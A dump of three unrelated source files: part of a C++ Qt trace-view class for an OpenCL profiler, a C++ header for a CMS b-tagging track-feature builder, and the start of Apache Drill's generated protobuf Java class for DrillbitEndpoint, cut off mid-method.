GT_IF_WITH_ASSERT((m_pSummaryView != nullptr) && (m_pTraceTabView != nullptr) && (m_pSessionTabWidget != nullptr))
{
m_pSummaryView->DisplaySummaryPageType(selectedIndex);
int indexOfSummary = m_pTraceTabView->indexOf(m_pSummaryView);
m_pTraceTabView->setCurrentIndex(indexOfSummary);
// Set the summarizer as current:
m_pSessionTabWidget->setCurrentIndex(0);
}
}
void TraceView::UpdateRenamedSession(const osFilePath& oldSessionFileName, const osFilePath& newSessionFileName)
{
// Call the base class implementation
SharedSessionWindow::UpdateRenamedSession(oldSessionFileName, newSessionFileName);
}
void TraceView::OnEditCopy()
{
GT_IF_WITH_ASSERT(m_pTraceTabView != nullptr)
{
QWidget* pCurrent = m_pTraceTabView->currentWidget();
SummaryView* pSummaryView = qobject_cast<SummaryView*>(pCurrent);
if (pSummaryView != nullptr)
{
pSummaryView->OnEditCopy();
}
else
{
TraceTable* pTraceTable = qobject_cast<TraceTable*>(pCurrent);
if (pTraceTable != nullptr)
{
pTraceTable->OnEditCopy();
}
}
}
}
void TraceView::OnEditSelectAll()
{
GT_IF_WITH_ASSERT(m_pTraceTabView != nullptr)
{
QWidget* pCurrent = m_pTraceTabView->currentWidget();
SummaryView* pSummaryView = qobject_cast<SummaryView*>(pCurrent);
if (pSummaryView != nullptr)
{
pSummaryView->OnEditSelectAll();
}
else
{
TraceTable* pTraceTable = qobject_cast<TraceTable*>(pCurrent);
if (pTraceTable != nullptr)
{
pTraceTable->OnEditSelectAll();
}
}
}
}
void TraceView::DisplayItemInPropertiesView(acTimelineItem* pItem)
{
// Sanity check:
GT_IF_WITH_ASSERT(pItem != nullptr)
{
acTimelineItemToolTip itemTooltip;
pItem->tooltipItems(itemTooltip);
// Create an HTML content item:
afHTMLContent htmlContent(acQStringToGTString(pItem->text()));
for (int i = 0 ; i < itemTooltip.count(); i++)
{
// Get the current name and value:
QString name = itemTooltip.getName(i);
QString val = itemTooltip.getValue(i);
htmlContent.addHTMLItem(afHTMLContent::AP_HTML_LINE, acQStringToGTString(name), acQStringToGTString(val));
}
gtString htmlText;
htmlContent.toString(htmlText);
afApplicationCommands::instance()->propertiesView()->setHTMLText(acGTStringToQString(htmlText), nullptr);
}
}
void TraceView::OnCollapseAll()
{
// Sanity check:
GT_IF_WITH_ASSERT(m_pTraceTabView != nullptr)
{
TraceTable* pTraceTable = qobject_cast<TraceTable*>(m_pTraceTabView->currentWidget());
if (pTraceTable != nullptr)
{
pTraceTable->collapseAll();
}
}
}
void TraceView::OnExpandAll()
{
// Sanity check:
GT_IF_WITH_ASSERT(m_pTraceTabView != nullptr)
{
TraceTable* pTraceTable = qobject_cast<TraceTable*>(m_pTraceTabView->currentWidget());
if (pTraceTable != nullptr)
{
pTraceTable->expandAll();
}
}
}
void TraceView::OnZoomItemInTimeline()
{
// Sanity check:
GT_IF_WITH_ASSERT(m_pTraceTabView != nullptr)
{
TraceTable* pTraceTable = qobject_cast<TraceTable*>(m_pTraceTabView->currentWidget());
if ((pTraceTable != nullptr) && (m_pTimeline != nullptr))
{
GT_IF_WITH_ASSERT(!pTraceTable->selectionModel()->selectedIndexes().isEmpty())
{
QModelIndex firstSelected = pTraceTable->selectionModel()->selectedIndexes().first();
TraceTableItem* pSelectedItem = static_cast<TraceTableItem*>(firstSelected.internalPointer());
GT_IF_WITH_ASSERT(pSelectedItem != nullptr)
{
m_pTimeline->ZoomToItem(pSelectedItem->GetTimelineItem(), true);
}
}
}
}
}
void TraceView::OnExportToCSV()
{
// Sanity check:
GT_IF_WITH_ASSERT(m_pTraceTabView != nullptr)
{
TraceTable* pTraceTable = qobject_cast<TraceTable*>(m_pTraceTabView->currentWidget());
if (pTraceTable != nullptr)
{
// The file path for the saved CSV file:
QString csvFilePathStr;
// Build the CSV default file name:
QString fileName = QString(GPU_CSV_FileNameFormat).arg(m_pCurrentSession->m_displayName).arg(GPU_CSV_FileNameTraceView);
bool rc = afApplicationCommands::instance()->ShowQTSaveCSVFileDialog(csvFilePathStr, fileName, this);
GT_IF_WITH_ASSERT(rc)
{
// Export the web view table to a CSV file:
rc = pTraceTable->ExportToCSV(csvFilePathStr);
GT_ASSERT(rc);
}
}
}
}
TraceView::OCLQueueBranchInfo* TraceView::GetBranchInfo(unsigned int contextId, unsigned int queueId, const QString& strContextHandle, const QString& deviceNameStr, const QString& strQueueHandle)
{
OCLQueueBranchInfo* pRetVal = nullptr;
    acTimelineBranch* pContextBranch = nullptr;
// Create OpenCL branch if it does not yet exist
if (m_pOpenCLBranch == nullptr)
{
m_pOpenCLBranch = new acTimelineBranch();
m_pOpenCLBranch->setText(GPU_STR_TraceViewOpenCL);
}
if (m_oclCtxMap.contains(contextId))
{
pContextBranch = m_oclCtxMap[contextId];
}
else
{
pContextBranch = new acTimelineBranch();
pContextBranch->SetBGColor(QColor::fromRgb(230, 230, 230));
pContextBranch->setText(QString(tr("Context %1 (%2)")).arg(contextId).arg(strContextHandle));
m_oclCtxMap[contextId] = pContextBranch;
}
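    // Get or lazily create the per-queue branch info (queue branch plus its kernel-execution and data-transfer sub-branches)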
if (m_oclQueueMap.contains(queueId))
{
pRetVal = m_oclQueueMap[queueId];
}
else
{
pRetVal = new OCLQueueBranchInfo;
// Create the queue branch
pRetVal->m_pQueueBranch = new acTimelineBranch();
pRetVal->m_pQueueBranch->setText(QString(tr(GPU_STR_TraceViewQueueRow)).arg(queueId).arg(deviceNameStr).arg(strQueueHandle));
pRetVal->m_pQueueBranch->SetBGColor(QColor::fromRgb(230, 230, 230));
pRetVal->m_pKernelBranch = new acTimelineBranch();
pRetVal->m_pKernelBranch->setText(tr("Kernel Execution"));
pRetVal->m_pKernelBranch->SetBGColor(QColor::fromRgb(230, 230, 230));
pRetVal->m_pMemoryBranch = new acTimelineBranch();
pRetVal->m_pMemoryBranch->setText(tr("Data Transfer"));
pRetVal->m_pMemoryBranch->SetBGColor(QColor::fromRgb(230, 230, 230));
// Notice:
// we do not initialize the fill operations branch by default. We only do it when there are fill operation functions
pRetVal->m_pQueueBranch->addSubBranch(pRetVal->m_pMemoryBranch);
pRetVal->m_pQueueBranch->addSubBranch(pRetVal->m_pKernelBranch);
pContextBranch->addSubBranch(pRetVal->m_pQueueBranch);
m_oclQueueMap[queueId] = pRetVal;
}
return pRetVal;
}
void TraceView::BuildWindowLayout()
{
m_pMainSplitter = new QSplitter(this);
m_pTimeline = new acTimeline(this);
m_pTraceTabView = new QTabWidget(this);
// m_findToolBar = new FindToolBarView(this);
//
m_pTraceTableContextMenu = new QMenu(this);
m_pSessionTabWidget->setTabsClosable(true);
m_pTraceTabView->setTabsClosable(false);
m_pMainSplitter->setOrientation(Qt::Vertical);
m_pMainSplitter->addWidget(m_pTimeline);
m_pMainSplitter->addWidget(m_pTraceTabView);
// addWidget(m_findToolBar);
// set the initial sizes for the timeline, trace/summary tabs, and find toolbar
QList<int> sizeList;
sizeList.append(100); // timeline
sizeList.append(100); // trace/summary tabs
// sizeList.append(10); // find toolbar
m_pMainSplitter->setSizes(sizeList);
m_pMainLayout = new QHBoxLayout(this);
m_pSessionTabWidget->addTab(m_pMainSplitter, "Application Timeline Trace");
m_pMainLayout->addWidget(m_pSessionTabWidget);
m_pMainLayout->setContentsMargins(0, 0, 0, 0);
setLayout(m_pMainLayout);
}
| 41,536 |
852 |
#ifndef RecoBTag_FeatureTools_SeedingTrackInfoBuilder_h
#define RecoBTag_FeatureTools_SeedingTrackInfoBuilder_h
#include "TrackingTools/Records/interface/TransientTrackRecord.h"
#include "TrackingTools/IPTools/interface/IPTools.h"
#include "RecoBTag/TrackProbability/interface/HistogramProbabilityEstimator.h"
namespace btagbtvdeep {
class SeedingTrackInfoBuilder {
public:
SeedingTrackInfoBuilder();
void buildSeedingTrackInfo(const reco::TransientTrack* it,
const reco::Vertex& pv,
const reco::Jet& jet, /*GlobalVector jetdirection,*/
float mass,
const std::pair<bool, Measurement1D>& ip,
const std::pair<bool, Measurement1D>& ip2d,
float jet_distance,
float jaxis_dlength,
HistogramProbabilityEstimator* m_probabilityEstimator,
bool m_computeProbabilities);
const float pt() const { return pt_; }
const float eta() const { return eta_; }
const float phi() const { return phi_; }
const float mass() const { return mass_; }
const float dz() const { return dz_; }
const float dxy() const { return dxy_; }
const float ip3d() const { return ip3D_; }
const float sip3d() const { return sip3D_; }
const float ip2d() const { return ip2D_; }
const float sip2d() const { return sip2D_; }
const float ip3d_Signed() const { return ip3D_signed_; }
const float sip3d_Signed() const { return sip3D_signed_; }
const float ip2d_Signed() const { return ip2D_signed_; }
const float sip2d_Signed() const { return sip2D_signed_; }
const float chi2reduced() const { return chi2reduced_; }
const float nPixelHits() const { return nPixelHits_; }
const float nHits() const { return nHits_; }
const float jetAxisDistance() const { return jetAxisDistance_; }
const float jetAxisDlength() const { return jetAxisDlength_; }
const float trackProbability3D() const { return trackProbability3D_; }
const float trackProbability2D() const { return trackProbability2D_; }
private:
float pt_;
float eta_;
float phi_;
float mass_;
float dz_;
float dxy_;
float ip3D_;
float sip3D_;
float ip2D_;
float sip2D_;
float ip3D_signed_;
float sip3D_signed_;
float ip2D_signed_;
float sip2D_signed_;
float chi2reduced_;
float nPixelHits_;
float nHits_;
float jetAxisDistance_;
float jetAxisDlength_;
float trackProbability3D_;
float trackProbability2D_;
};
} // namespace btagbtvdeep
#endif //RecoBTag_FeatureTools_SeedingTrackInfoBuilder_h
| 1,224 |
1,510 |
<filename>protocol/src/main/java/org/apache/drill/exec/proto/CoordinationProtos.java
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
// Generated by the protocol buffer compiler. DO NOT EDIT!
// source: Coordination.proto
package org.apache.drill.exec.proto;
public final class CoordinationProtos {
private CoordinationProtos() {}
public static void registerAllExtensions(
com.google.protobuf.ExtensionRegistryLite registry) {
}
public static void registerAllExtensions(
com.google.protobuf.ExtensionRegistry registry) {
registerAllExtensions(
(com.google.protobuf.ExtensionRegistryLite) registry);
}
public interface DrillbitEndpointOrBuilder extends
// @@protoc_insertion_point(interface_extends:exec.DrillbitEndpoint)
com.google.protobuf.MessageOrBuilder {
/**
* <code>optional string address = 1;</code>
* @return Whether the address field is set.
*/
boolean hasAddress();
/**
* <code>optional string address = 1;</code>
* @return The address.
*/
java.lang.String getAddress();
/**
* <code>optional string address = 1;</code>
* @return The bytes for address.
*/
com.google.protobuf.ByteString
getAddressBytes();
/**
* <code>optional int32 user_port = 2;</code>
* @return Whether the userPort field is set.
*/
boolean hasUserPort();
/**
* <code>optional int32 user_port = 2;</code>
* @return The userPort.
*/
int getUserPort();
/**
* <code>optional int32 control_port = 3;</code>
* @return Whether the controlPort field is set.
*/
boolean hasControlPort();
/**
* <code>optional int32 control_port = 3;</code>
* @return The controlPort.
*/
int getControlPort();
/**
* <code>optional int32 data_port = 4;</code>
* @return Whether the dataPort field is set.
*/
boolean hasDataPort();
/**
* <code>optional int32 data_port = 4;</code>
* @return The dataPort.
*/
int getDataPort();
/**
* <code>optional .exec.Roles roles = 5;</code>
* @return Whether the roles field is set.
*/
boolean hasRoles();
/**
* <code>optional .exec.Roles roles = 5;</code>
* @return The roles.
*/
org.apache.drill.exec.proto.CoordinationProtos.Roles getRoles();
/**
* <code>optional .exec.Roles roles = 5;</code>
*/
org.apache.drill.exec.proto.CoordinationProtos.RolesOrBuilder getRolesOrBuilder();
/**
* <code>optional string version = 6;</code>
* @return Whether the version field is set.
*/
boolean hasVersion();
/**
* <code>optional string version = 6;</code>
* @return The version.
*/
java.lang.String getVersion();
/**
* <code>optional string version = 6;</code>
* @return The bytes for version.
*/
com.google.protobuf.ByteString
getVersionBytes();
/**
* <code>optional .exec.DrillbitEndpoint.State state = 7;</code>
* @return Whether the state field is set.
*/
boolean hasState();
/**
* <code>optional .exec.DrillbitEndpoint.State state = 7;</code>
* @return The state.
*/
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.State getState();
/**
* <code>optional int32 http_port = 8;</code>
* @return Whether the httpPort field is set.
*/
boolean hasHttpPort();
/**
* <code>optional int32 http_port = 8;</code>
* @return The httpPort.
*/
int getHttpPort();
}
/**
* Protobuf type {@code exec.DrillbitEndpoint}
*/
public static final class DrillbitEndpoint extends
com.google.protobuf.GeneratedMessageV3 implements
// @@protoc_insertion_point(message_implements:exec.DrillbitEndpoint)
DrillbitEndpointOrBuilder {
private static final long serialVersionUID = 0L;
// Use DrillbitEndpoint.newBuilder() to construct.
private DrillbitEndpoint(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) {
super(builder);
}
private DrillbitEndpoint() {
address_ = "";
version_ = "";
state_ = 0;
}
@java.lang.Override
@SuppressWarnings({"unused"})
protected java.lang.Object newInstance(
UnusedPrivateParameter unused) {
return new DrillbitEndpoint();
}
@java.lang.Override
public final com.google.protobuf.UnknownFieldSet
getUnknownFields() {
return this.unknownFields;
}
private DrillbitEndpoint(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
this();
if (extensionRegistry == null) {
throw new java.lang.NullPointerException();
}
int mutable_bitField0_ = 0;
com.google.protobuf.UnknownFieldSet.Builder unknownFields =
com.google.protobuf.UnknownFieldSet.newBuilder();
try {
boolean done = false;
while (!done) {
int tag = input.readTag();
switch (tag) {
case 0:
done = true;
break;
case 10: {
com.google.protobuf.ByteString bs = input.readBytes();
bitField0_ |= 0x00000001;
address_ = bs;
break;
}
case 16: {
bitField0_ |= 0x00000002;
userPort_ = input.readInt32();
break;
}
case 24: {
bitField0_ |= 0x00000004;
controlPort_ = input.readInt32();
break;
}
case 32: {
bitField0_ |= 0x00000008;
dataPort_ = input.readInt32();
break;
}
case 42: {
org.apache.drill.exec.proto.CoordinationProtos.Roles.Builder subBuilder = null;
if (((bitField0_ & 0x00000010) != 0)) {
subBuilder = roles_.toBuilder();
}
roles_ = input.readMessage(org.apache.drill.exec.proto.CoordinationProtos.Roles.PARSER, extensionRegistry);
if (subBuilder != null) {
subBuilder.mergeFrom(roles_);
roles_ = subBuilder.buildPartial();
}
bitField0_ |= 0x00000010;
break;
}
case 50: {
com.google.protobuf.ByteString bs = input.readBytes();
bitField0_ |= 0x00000020;
version_ = bs;
break;
}
case 56: {
int rawValue = input.readEnum();
@SuppressWarnings("deprecation")
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.State value = org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.State.valueOf(rawValue);
if (value == null) {
unknownFields.mergeVarintField(7, rawValue);
} else {
bitField0_ |= 0x00000040;
state_ = rawValue;
}
break;
}
case 64: {
bitField0_ |= 0x00000080;
httpPort_ = input.readInt32();
break;
}
default: {
if (!parseUnknownField(
input, unknownFields, extensionRegistry, tag)) {
done = true;
}
break;
}
}
}
} catch (com.google.protobuf.InvalidProtocolBufferException e) {
throw e.setUnfinishedMessage(this);
} catch (java.io.IOException e) {
throw new com.google.protobuf.InvalidProtocolBufferException(
e).setUnfinishedMessage(this);
} finally {
this.unknownFields = unknownFields.build();
makeExtensionsImmutable();
}
}
public static final com.google.protobuf.Descriptors.Descriptor
getDescriptor() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_DrillbitEndpoint_descriptor;
}
@java.lang.Override
protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internalGetFieldAccessorTable() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_DrillbitEndpoint_fieldAccessorTable
.ensureFieldAccessorsInitialized(
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.class, org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.Builder.class);
}
/**
* Protobuf enum {@code exec.DrillbitEndpoint.State}
*/
public enum State
implements com.google.protobuf.ProtocolMessageEnum {
/**
* <code>STARTUP = 0;</code>
*/
STARTUP(0),
/**
* <code>ONLINE = 1;</code>
*/
ONLINE(1),
/**
* <code>QUIESCENT = 2;</code>
*/
QUIESCENT(2),
/**
* <code>OFFLINE = 3;</code>
*/
OFFLINE(3),
;
/**
* <code>STARTUP = 0;</code>
*/
public static final int STARTUP_VALUE = 0;
/**
* <code>ONLINE = 1;</code>
*/
public static final int ONLINE_VALUE = 1;
/**
* <code>QUIESCENT = 2;</code>
*/
public static final int QUIESCENT_VALUE = 2;
/**
* <code>OFFLINE = 3;</code>
*/
public static final int OFFLINE_VALUE = 3;
public final int getNumber() {
return value;
}
/**
* @param value The numeric wire value of the corresponding enum entry.
* @return The enum associated with the given numeric wire value.
* @deprecated Use {@link #forNumber(int)} instead.
*/
@java.lang.Deprecated
public static State valueOf(int value) {
return forNumber(value);
}
/**
* @param value The numeric wire value of the corresponding enum entry.
* @return The enum associated with the given numeric wire value.
*/
public static State forNumber(int value) {
switch (value) {
case 0: return STARTUP;
case 1: return ONLINE;
case 2: return QUIESCENT;
case 3: return OFFLINE;
default: return null;
}
}
public static com.google.protobuf.Internal.EnumLiteMap<State>
internalGetValueMap() {
return internalValueMap;
}
private static final com.google.protobuf.Internal.EnumLiteMap<
State> internalValueMap =
new com.google.protobuf.Internal.EnumLiteMap<State>() {
public State findValueByNumber(int number) {
return State.forNumber(number);
}
};
public final com.google.protobuf.Descriptors.EnumValueDescriptor
getValueDescriptor() {
return getDescriptor().getValues().get(ordinal());
}
public final com.google.protobuf.Descriptors.EnumDescriptor
getDescriptorForType() {
return getDescriptor();
}
public static final com.google.protobuf.Descriptors.EnumDescriptor
getDescriptor() {
return org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.getDescriptor().getEnumTypes().get(0);
}
private static final State[] VALUES = values();
public static State valueOf(
com.google.protobuf.Descriptors.EnumValueDescriptor desc) {
if (desc.getType() != getDescriptor()) {
throw new java.lang.IllegalArgumentException(
"EnumValueDescriptor is not for this type.");
}
return VALUES[desc.getIndex()];
}
private final int value;
private State(int value) {
this.value = value;
}
// @@protoc_insertion_point(enum_scope:exec.DrillbitEndpoint.State)
}
private int bitField0_;
public static final int ADDRESS_FIELD_NUMBER = 1;
private volatile java.lang.Object address_;
/**
* <code>optional string address = 1;</code>
* @return Whether the address field is set.
*/
public boolean hasAddress() {
return ((bitField0_ & 0x00000001) != 0);
}
/**
* <code>optional string address = 1;</code>
* @return The address.
*/
public java.lang.String getAddress() {
java.lang.Object ref = address_;
if (ref instanceof java.lang.String) {
return (java.lang.String) ref;
} else {
com.google.protobuf.ByteString bs =
(com.google.protobuf.ByteString) ref;
java.lang.String s = bs.toStringUtf8();
if (bs.isValidUtf8()) {
address_ = s;
}
return s;
}
}
/**
* <code>optional string address = 1;</code>
* @return The bytes for address.
*/
public com.google.protobuf.ByteString
getAddressBytes() {
java.lang.Object ref = address_;
if (ref instanceof java.lang.String) {
com.google.protobuf.ByteString b =
com.google.protobuf.ByteString.copyFromUtf8(
(java.lang.String) ref);
address_ = b;
return b;
} else {
return (com.google.protobuf.ByteString) ref;
}
}
public static final int USER_PORT_FIELD_NUMBER = 2;
private int userPort_;
/**
* <code>optional int32 user_port = 2;</code>
* @return Whether the userPort field is set.
*/
public boolean hasUserPort() {
return ((bitField0_ & 0x00000002) != 0);
}
/**
* <code>optional int32 user_port = 2;</code>
* @return The userPort.
*/
public int getUserPort() {
return userPort_;
}
public static final int CONTROL_PORT_FIELD_NUMBER = 3;
private int controlPort_;
/**
* <code>optional int32 control_port = 3;</code>
* @return Whether the controlPort field is set.
*/
public boolean hasControlPort() {
return ((bitField0_ & 0x00000004) != 0);
}
/**
* <code>optional int32 control_port = 3;</code>
* @return The controlPort.
*/
public int getControlPort() {
return controlPort_;
}
public static final int DATA_PORT_FIELD_NUMBER = 4;
private int dataPort_;
/**
* <code>optional int32 data_port = 4;</code>
* @return Whether the dataPort field is set.
*/
public boolean hasDataPort() {
return ((bitField0_ & 0x00000008) != 0);
}
/**
* <code>optional int32 data_port = 4;</code>
* @return The dataPort.
*/
public int getDataPort() {
return dataPort_;
}
public static final int ROLES_FIELD_NUMBER = 5;
private org.apache.drill.exec.proto.CoordinationProtos.Roles roles_;
/**
* <code>optional .exec.Roles roles = 5;</code>
* @return Whether the roles field is set.
*/
public boolean hasRoles() {
return ((bitField0_ & 0x00000010) != 0);
}
/**
* <code>optional .exec.Roles roles = 5;</code>
* @return The roles.
*/
public org.apache.drill.exec.proto.CoordinationProtos.Roles getRoles() {
return roles_ == null ? org.apache.drill.exec.proto.CoordinationProtos.Roles.getDefaultInstance() : roles_;
}
/**
* <code>optional .exec.Roles roles = 5;</code>
*/
public org.apache.drill.exec.proto.CoordinationProtos.RolesOrBuilder getRolesOrBuilder() {
return roles_ == null ? org.apache.drill.exec.proto.CoordinationProtos.Roles.getDefaultInstance() : roles_;
}
public static final int VERSION_FIELD_NUMBER = 6;
private volatile java.lang.Object version_;
/**
* <code>optional string version = 6;</code>
* @return Whether the version field is set.
*/
public boolean hasVersion() {
return ((bitField0_ & 0x00000020) != 0);
}
/**
* <code>optional string version = 6;</code>
* @return The version.
*/
public java.lang.String getVersion() {
java.lang.Object ref = version_;
if (ref instanceof java.lang.String) {
return (java.lang.String) ref;
} else {
com.google.protobuf.ByteString bs =
(com.google.protobuf.ByteString) ref;
java.lang.String s = bs.toStringUtf8();
if (bs.isValidUtf8()) {
version_ = s;
}
return s;
}
}
/**
* <code>optional string version = 6;</code>
* @return The bytes for version.
*/
public com.google.protobuf.ByteString
getVersionBytes() {
java.lang.Object ref = version_;
if (ref instanceof java.lang.String) {
com.google.protobuf.ByteString b =
com.google.protobuf.ByteString.copyFromUtf8(
(java.lang.String) ref);
version_ = b;
return b;
} else {
return (com.google.protobuf.ByteString) ref;
}
}
public static final int STATE_FIELD_NUMBER = 7;
private int state_;
/**
* <code>optional .exec.DrillbitEndpoint.State state = 7;</code>
* @return Whether the state field is set.
*/
public boolean hasState() {
return ((bitField0_ & 0x00000040) != 0);
}
/**
* <code>optional .exec.DrillbitEndpoint.State state = 7;</code>
* @return The state.
*/
public org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.State getState() {
@SuppressWarnings("deprecation")
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.State result = org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.State.valueOf(state_);
return result == null ? org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.State.STARTUP : result;
}
public static final int HTTP_PORT_FIELD_NUMBER = 8;
private int httpPort_;
/**
* <code>optional int32 http_port = 8;</code>
* @return Whether the httpPort field is set.
*/
public boolean hasHttpPort() {
return ((bitField0_ & 0x00000080) != 0);
}
/**
* <code>optional int32 http_port = 8;</code>
* @return The httpPort.
*/
public int getHttpPort() {
return httpPort_;
}
private byte memoizedIsInitialized = -1;
@java.lang.Override
public final boolean isInitialized() {
byte isInitialized = memoizedIsInitialized;
if (isInitialized == 1) return true;
if (isInitialized == 0) return false;
memoizedIsInitialized = 1;
return true;
}
@java.lang.Override
public void writeTo(com.google.protobuf.CodedOutputStream output)
throws java.io.IOException {
if (((bitField0_ & 0x00000001) != 0)) {
com.google.protobuf.GeneratedMessageV3.writeString(output, 1, address_);
}
if (((bitField0_ & 0x00000002) != 0)) {
output.writeInt32(2, userPort_);
}
if (((bitField0_ & 0x00000004) != 0)) {
output.writeInt32(3, controlPort_);
}
if (((bitField0_ & 0x00000008) != 0)) {
output.writeInt32(4, dataPort_);
}
if (((bitField0_ & 0x00000010) != 0)) {
output.writeMessage(5, getRoles());
}
if (((bitField0_ & 0x00000020) != 0)) {
com.google.protobuf.GeneratedMessageV3.writeString(output, 6, version_);
}
if (((bitField0_ & 0x00000040) != 0)) {
output.writeEnum(7, state_);
}
if (((bitField0_ & 0x00000080) != 0)) {
output.writeInt32(8, httpPort_);
}
unknownFields.writeTo(output);
}
@java.lang.Override
public int getSerializedSize() {
int size = memoizedSize;
if (size != -1) return size;
size = 0;
if (((bitField0_ & 0x00000001) != 0)) {
size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, address_);
}
if (((bitField0_ & 0x00000002) != 0)) {
size += com.google.protobuf.CodedOutputStream
.computeInt32Size(2, userPort_);
}
if (((bitField0_ & 0x00000004) != 0)) {
size += com.google.protobuf.CodedOutputStream
.computeInt32Size(3, controlPort_);
}
if (((bitField0_ & 0x00000008) != 0)) {
size += com.google.protobuf.CodedOutputStream
.computeInt32Size(4, dataPort_);
}
if (((bitField0_ & 0x00000010) != 0)) {
size += com.google.protobuf.CodedOutputStream
.computeMessageSize(5, getRoles());
}
if (((bitField0_ & 0x00000020) != 0)) {
size += com.google.protobuf.GeneratedMessageV3.computeStringSize(6, version_);
}
if (((bitField0_ & 0x00000040) != 0)) {
size += com.google.protobuf.CodedOutputStream
.computeEnumSize(7, state_);
}
if (((bitField0_ & 0x00000080) != 0)) {
size += com.google.protobuf.CodedOutputStream
.computeInt32Size(8, httpPort_);
}
size += unknownFields.getSerializedSize();
memoizedSize = size;
return size;
}
@java.lang.Override
public boolean equals(final java.lang.Object obj) {
if (obj == this) {
return true;
}
if (!(obj instanceof org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint)) {
return super.equals(obj);
}
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint other = (org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint) obj;
if (hasAddress() != other.hasAddress()) return false;
if (hasAddress()) {
if (!getAddress()
.equals(other.getAddress())) return false;
}
if (hasUserPort() != other.hasUserPort()) return false;
if (hasUserPort()) {
if (getUserPort()
!= other.getUserPort()) return false;
}
if (hasControlPort() != other.hasControlPort()) return false;
if (hasControlPort()) {
if (getControlPort()
!= other.getControlPort()) return false;
}
if (hasDataPort() != other.hasDataPort()) return false;
if (hasDataPort()) {
if (getDataPort()
!= other.getDataPort()) return false;
}
if (hasRoles() != other.hasRoles()) return false;
if (hasRoles()) {
if (!getRoles()
.equals(other.getRoles())) return false;
}
if (hasVersion() != other.hasVersion()) return false;
if (hasVersion()) {
if (!getVersion()
.equals(other.getVersion())) return false;
}
if (hasState() != other.hasState()) return false;
if (hasState()) {
if (state_ != other.state_) return false;
}
if (hasHttpPort() != other.hasHttpPort()) return false;
if (hasHttpPort()) {
if (getHttpPort()
!= other.getHttpPort()) return false;
}
if (!unknownFields.equals(other.unknownFields)) return false;
return true;
}
@java.lang.Override
public int hashCode() {
if (memoizedHashCode != 0) {
return memoizedHashCode;
}
int hash = 41;
hash = (19 * hash) + getDescriptor().hashCode();
if (hasAddress()) {
hash = (37 * hash) + ADDRESS_FIELD_NUMBER;
hash = (53 * hash) + getAddress().hashCode();
}
if (hasUserPort()) {
hash = (37 * hash) + USER_PORT_FIELD_NUMBER;
hash = (53 * hash) + getUserPort();
}
if (hasControlPort()) {
hash = (37 * hash) + CONTROL_PORT_FIELD_NUMBER;
hash = (53 * hash) + getControlPort();
}
if (hasDataPort()) {
hash = (37 * hash) + DATA_PORT_FIELD_NUMBER;
hash = (53 * hash) + getDataPort();
}
if (hasRoles()) {
hash = (37 * hash) + ROLES_FIELD_NUMBER;
hash = (53 * hash) + getRoles().hashCode();
}
if (hasVersion()) {
hash = (37 * hash) + VERSION_FIELD_NUMBER;
hash = (53 * hash) + getVersion().hashCode();
}
if (hasState()) {
hash = (37 * hash) + STATE_FIELD_NUMBER;
hash = (53 * hash) + state_;
}
if (hasHttpPort()) {
hash = (37 * hash) + HTTP_PORT_FIELD_NUMBER;
hash = (53 * hash) + getHttpPort();
}
hash = (29 * hash) + unknownFields.hashCode();
memoizedHashCode = hash;
return hash;
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint parseFrom(
java.nio.ByteBuffer data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint parseFrom(
java.nio.ByteBuffer data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint parseFrom(
com.google.protobuf.ByteString data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint parseFrom(
com.google.protobuf.ByteString data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint parseFrom(byte[] data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint parseFrom(
byte[] data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint parseFrom(java.io.InputStream input)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint parseFrom(
java.io.InputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
